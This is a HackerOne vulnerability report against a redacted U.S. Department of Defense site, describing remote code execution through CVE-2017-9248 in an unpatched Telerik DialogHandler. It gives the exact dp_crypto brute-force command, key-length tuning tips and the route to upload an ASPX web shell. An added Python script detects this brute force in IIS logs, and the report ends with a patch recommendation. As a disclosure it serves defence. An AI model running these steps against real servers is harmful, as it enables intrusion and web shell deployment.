U.S. Dept Of Defense: RCE on https://█████/ Using CVE-2017-9248

2019-02-06T02:15:44
ID H1:491668
Type hackerone
Reporter warsong
Modified 2019-10-10T19:12:25

Description

Summary: https://█████████/ is hosting an unpatched version of the Telerik DialogHandler (Telerik.Web.UI.DialogHandler.aspx), allowing the machine key to be brute forced. The machine key can be used to access the DNN file manager and upload arbitrary files, including ASPX, giving a web shell and RCE.

Description: Older versions of the Telerik Dialog Handler have a known cryptographic weakness (CVE-2017-9248) which, when exploited, can be used to brute force the machine key and gain access to the DNN file manager. The file manager allows ASPX shell upload and RCE.

Step-by-step Reproduction Instructions

Hit https://███/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx and notice the handler dialog message. Download https://github.com/bao7uo/dp_crypto to make brute force simple and run:

python dp_crypto.py -k https://███████/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx 88 all 21

Wait for the script to finish and the key will be integrated into a link to the file manager for DNN. You can use this link to upload arbitrary files to DNN. I uploaded a PNG for proof, but ASPX works just as well here. I had to do a little trial and error on this one: it uses the ASCII character set, and figuring out a key length of 88 took a little doing, but going longer than the real key causes the base64 to start validating again from the beginning, so in a test of 128 key length I was able to see the key repeat at the 89th position.
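As an added detection example (not part of this report or of the dp_crypto tool), the following Python flags the log pattern the brute force described above leaves behind: one client sending many distinct dp values to Telerik.Web.UI.DialogHandler.aspx in a short window, whereas a real editor session reuses the single dp the server issued. The IIS W3C field order, the threshold, and the sample IPs and timestamps are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

HANDLER = "Telerik.Web.UI.DialogHandler.aspx"
# Assumed IIS W3C field order: date time c-ip cs-uri-stem cs-uri-query sc-status
LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$")

def parse_line(line):
    """Parse one log line into a dict, extracting the dp= query value (None if absent)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{m['date']} {m['time']}", "%Y-%m-%d %H:%M:%S")
    dp = next((p[3:] for p in m["query"].split("&") if p.startswith("dp=")), None)
    return {"ts": ts, "ip": m["ip"], "stem": m["stem"], "dp": dp, "status": int(m["status"])}

def find_dialoghandler_bruteforce(lines, window=timedelta(seconds=60), threshold=50):
    """Return {client_ip: peak_distinct_dp} for clients sending more than `threshold`
    distinct dp values to the DialogHandler within any sliding `window`."""
    per_ip = defaultdict(list)  # ip -> [(timestamp, dp)]
    for line in lines:
        rec = parse_line(line)
        if rec and rec["stem"].endswith(HANDLER) and rec["dp"] is not None:
            per_ip[rec["ip"]].append((rec["ts"], rec["dp"]))
    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:  # slide window forward
                start += 1
            distinct = len({dp for _, dp in events[start:end + 1]})
            if distinct > threshold:
                flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged

def constructed_sample():
    """Constructed log lines (made-up IPs and times): one client cycling 120 dp
    values in 30 seconds, one legitimate user reusing a single dp."""
    base = datetime(2019, 2, 5, 2, 10, 0)
    stem = "/Providers/HtmlEditorProviders/Telerik/" + HANDLER
    lines = [f"{base + timedelta(milliseconds=250 * i):%Y-%m-%d %H:%M:%S} 10.0.0.5 {stem} "
             f"DialogName=DocumentManager&dp=guess{i:04d} 500" for i in range(120)]
    lines += [f"{base + timedelta(minutes=i):%Y-%m-%d %H:%M:%S} 10.0.0.9 {stem} "
              f"DialogName=DocumentManager&dp=legit 200" for i in range(3)]
    return lines
```

Running `find_dialoghandler_bruteforce(constructed_sample())` returns `{'10.0.0.5': 120}`; the legitimate client with a single reused dp is not flagged.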

https://████/GSP.png

Product, Version, and Configuration (If applicable)

Telerik <= 2017.1.118

Suggested Mitigation/Remediation Actions

Patch Telerik or switch to a different editor like CKEditor.

Impact

Critical: Exploitation allows for a web shell, defacement, etc., through arbitrary unrestricted file uploads.